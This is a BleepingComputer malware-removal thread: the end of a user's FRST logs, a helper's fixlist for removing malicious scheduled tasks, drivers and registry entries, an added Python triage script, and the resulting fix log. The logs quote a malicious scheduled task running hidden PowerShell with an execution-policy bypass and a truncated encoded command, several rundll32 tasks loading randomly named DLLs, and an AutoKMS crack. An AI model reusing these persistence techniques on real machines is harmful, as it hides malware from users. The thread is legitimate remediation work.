Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:29:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}


==================== Memory info ===========================

Processor: Intel® Core™ i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 10%
Total physical RAM: 16321.73 MB
Available physical RAM: 14647.89 MB
Total Virtual: 32641.63 MB
Available Virtual: 31499 MB

==================== Drives ================================

Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:89.17 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS

\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 




 


#2 nasdaq

nasdaq

  • Malware Response Team

Posted 19 March 2018 - 09:51 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\System32\drivers\prilock.sys

Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
C:\Windows\System32\Tasks\wXkHuguozQzssiw2
C:\Program Files (x86)\GveoMZenU
C:\Windows\System32\Tasks\OHurYzwpfZsLsh
C:\Program Files (x86)\pBsTWTvYOXtU2
C:\Windows\System32\Tasks\AutoKMS
C:\Windows\AutoKMS
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
C:\Program Files (x86)\zKUGIuVeiGvyC
C:\Program Files\K3QPCMS68Z

2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

If the computer has restarted in Normal Mode run Malwarebytes.

Run the Farbar program and post fresh logs.
Make sure you mark the button to create a new Addition.txt file.

Let me know what problem persists.
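
For readers triaging the scheduled-task entries in the fixlist above, here is an added example (not part of the thread and not FRST's own code) that parses FRST "Task:" lines, flags the command-line traits seen on this page, and decodes the visible prefix of the -EncodedCommand value as Base64 over UTF-16LE. The function names and the flag heuristics are assumptions made for illustration; the sample lines are copied from the fixlist.

```python
import base64
import re

# Visible start of the -EncodedCommand value from the fixlist above. FRST cut the
# rest ("the data entry has 10064 more characters"), so this is only a prefix.
B64_PREFIX = (
    "IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8A"
    "cgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMA"
    "YwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA"
)

# Task lines copied from the fixlist above.
SAMPLE_TASK_LINES = [
    (r"Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - "
     r"System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}"
     r" => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo"
     r" -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand "
     + B64_PREFIX + " (the data entry has 10064 more characters). <==== ATTENTION"),
    (r"Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - "
     r"System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}"),
    (r"Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2"
     r' => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1'),
    (r"Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS"
     r" => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()"),
]

# "Task: {GUID} - <task path>" with an optional " => <command line>" part.
TASK_RE = re.compile(r"^Task: (\{[0-9A-Fa-f-]+\}) - (\S.*?)(?: => (.*))?$")
RUNDLL_ORDINAL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?,#\d+', re.I)
BASE64_RE = re.compile(r"[A-Za-z0-9+/=]+")


def decode_encoded_command(b64_fragment):
    """Decode a possibly truncated -EncodedCommand value (Base64 of UTF-16LE text)."""
    # A truncated fragment may end mid-quantum: keep whole 4-character groups only.
    usable = b64_fragment[: len(b64_fragment) - len(b64_fragment) % 4]
    raw = base64.b64decode(usable)
    # UTF-16LE needs an even byte count: drop a dangling half code unit.
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def param_values(tokens, full_name, aliases=()):
    """Values following any token that is a prefix of full_name or a known alias.

    powershell.exe accepts shortened parameter names (for example -enc), so the
    match is on prefixes rather than on the full spelling.
    """
    values = []
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok.startswith("-") and name and (full_name.startswith(name) or name in aliases):
            values.append(tokens[i + 1])
    return values


def triage_task_line(line):
    """Parse one FRST Task line; return a dict with flags, or None if it is not a Task line."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    guid, task, command = m.groups()
    result = {"guid": guid, "task": task, "command": command, "flags": [], "decoded": None}
    if command is None:  # FRST also lists the task path alone, without a command
        return result
    if re.search(r"powershell(\.exe)?\b", command, re.I):
        tokens = command.split()
        encoded = [v for v in param_values(tokens, "encodedcommand", ("ec",))
                   if BASE64_RE.fullmatch(v)]
        if encoded:
            result["flags"].append("encoded command")
            result["decoded"] = decode_encoded_command(encoded[0])
        if any(v.lower() == "hidden" for v in param_values(tokens, "windowstyle")):
            result["flags"].append("hidden window")
        if any(v.lower() == "bypass" for v in param_values(tokens, "executionpolicy", ("ep",))):
            result["flags"].append("execution policy bypass")
    if RUNDLL_ORDINAL_RE.match(command):
        result["flags"].append("rundll32 export by ordinal")
    return result


def triage(lines):
    """Triage every Task line in an iterable of FRST log lines."""
    return [r for r in (triage_task_line(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for item in triage(SAMPLE_TASK_LINES):
        print(item["task"], item["flags"])
        if item["decoded"]:
            print("  decoded prefix:", repr(item["decoded"]))
```

The heuristics look only at the shape of the command line, so an entry such as the AutoKMS task gets no flag here even though the fixlist removes it. The decoded text is just the part FRST logged; the rest of the script is not recoverable from this log.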

#3 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 19 March 2018 - 11:07 AM

Hello, and thank you for taking the time to help me. It is very appreciated.

 

I ran the fix-list in fail-safe mode. After that, the computer started in normal mode WITHOUT going black after a few seconds. It appears that it did not load the usual auto-run programs, but other than that, nothing seemed off. I was, however, unable to start Malwarebytes Anti-Malware. I got a prompt saying "Unable to connect the Service" (see attached screenshot).

 

After that, I started FRST. I got another prompt, saying "Failed to update(1)" (see attached screenshot). The program did start though, and I was able to run the scan.

 

Due to the events described below, I will only be able to show the fixlog and the two frst-logs.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 16:50:55) Run:1
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\System32\drivers\prilock.sys

Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
C:\Windows\System32\Tasks\wXkHuguozQzssiw2
C:\Program Files (x86)\GveoMZenU
C:\Windows\System32\Tasks\OHurYzwpfZsLsh
C:\Program Files (x86)\pBsTWTvYOXtU2
C:\Windows\System32\Tasks\AutoKMS
C:\Windows\AutoKMS
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
C:\Program Files (x86)\zKUGIuVeiGvyC
C:\Program Files\K3QPCMS68Z

2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat

End
*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Report" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6c4e0517-4ea1-11e3-8ffc-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{6c4e0517-4ea1-11e3-8ffc-74d02b96086c} => not found
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d6896687-cb1f-11e3-a1c7-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{d6896687-cb1f-11e3-a1c7-74d02b96086c} => not found
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ec015733-b07d-11e7-9a6f-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{ec015733-b07d-11e7-9a6f-74d02b96086c} => not found
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\System\CurrentControlSet\Services\NvStreamNetworkSvc" => removed successfully
NvStreamNetworkSvc => service removed successfully
"HKLM\System\CurrentControlSet\Services\NvStreamSvc" => removed successfully
NvStreamSvc => service removed successfully
"HKLM\System\CurrentControlSet\Services\WsDrvInst" => removed successfully
WsDrvInst => service removed successfully
"HKLM\System\CurrentControlSet\Services\prilock" => removed successfully
prilock => service removed successfully
"HKLM\System\CurrentControlSet\Services\ALSysIO" => removed successfully
ALSysIO => service removed successfully
"HKLM\System\CurrentControlSet\Services\gdgqdwdi" => removed successfully
gdgqdwdi => service removed successfully
"HKLM\System\CurrentControlSet\Services\VGPU" => removed successfully
VGPU => service removed successfully
C:\Windows\System32\drivers\prilock.sys => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6230731C-1C18-4CF1-A20D-7132A76583D3}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3}" => removed successfully
C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3} => could not remove. Access Denied.
"C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179} => could not remove. Access Denied.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{13AA3023-6A6A-479F-A0A0-0E803510CA59}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13AA3023-6A6A-479F-A0A0-0E803510CA59}" => removed successfully
C:\Windows\System32\Tasks\wXkHuguozQzssiw2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\wXkHuguozQzssiw2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{584F7B10-0278-459B-8253-A225517D91AF}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{584F7B10-0278-459B-8253-A225517D91AF}" => removed successfully
C:\Windows\System32\Tasks\OHurYzwpfZsLsh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OHurYzwpfZsLsh" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{AB73D322-7316-4971-BE0D-4CA5E8D9C1DC}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB73D322-7316-4971-BE0D-4CA5E8D9C1DC}" => removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B22B3AE9-EA76-4331-A232-E8A08C28BF26}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B22B3AE9-EA76-4331-A232-E8A08C28BF26}" => removed successfully
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\VTsFYYvpoVEusFPoU2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BB369166-0B23-49CC-9856-AE0991891F5A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB369166-0B23-49CC-9856-AE0991891F5A}" => removed successfully
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\oWotDXBujaUxMpNAqmS2" => removed successfully
C:\Windows => ":E34B0F9ED3964806" ADS removed successfully
C:\Users\Martin => ":Heroes & Generals" ADS removed successfully
"C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
"C:\Windows\System32\Tasks\wXkHuguozQzssiw2" => not found
"C:\Program Files (x86)\GveoMZenU" => not found
"C:\Windows\System32\Tasks\OHurYzwpfZsLsh" => not found
"C:\Program Files (x86)\pBsTWTvYOXtU2" => not found
"C:\Windows\System32\Tasks\AutoKMS" => not found
C:\Windows\AutoKMS => moved successfully
"C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2" => not found
"C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR" => not found
"C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2" => not found
"C:\Program Files (x86)\zKUGIuVeiGvyC" => not found
C:\Program Files\K3QPCMS68Z => moved successfully
C:\Windows\Minidump\030218-7519-01.dmp => moved successfully
